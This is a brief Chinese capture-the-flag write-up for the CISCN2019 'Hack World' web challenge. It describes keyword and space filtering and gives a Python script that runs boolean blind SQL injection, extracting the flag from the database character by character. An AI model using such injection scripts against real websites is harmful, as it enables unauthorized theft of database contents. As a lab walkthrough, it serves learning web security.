[CISCN2019 华北赛区 Day2 Web1]Hack World
知识点
- fuzz
- python盲注脚本
过程
fuzz一哈
一个搜索框,搜索框输入1或2会返回结果,其他都返回bool(false)。过滤了union、and、or、空格等
贴上脚本:
import requests
url = "http://a5a19ec2-3fe1-4f07-9465-f4c861d25093.node4.buuoj.cn:81/index.php"
result = ""
num = 0 # 用了来判断是不是flag已经拼完整了
for i in range(1, 60):
if num == 1:
break
for j in range(32, 128):
payload = "if(ascii(substr((select(flag)from(flag)),%d,1))=%d,1,2)" % (i, j)
# print(str((i-1)*96+j-32)+":~"+payload+"~")
data = {
"id": payload,
}
r = requests.post(url, data=data)
r.encoding = r.apparent_encoding
if "Hello" in r.text:
x = chr(j)
result += str(x)
print(result)
break
if "}" in result:
print(result)
num = 1
break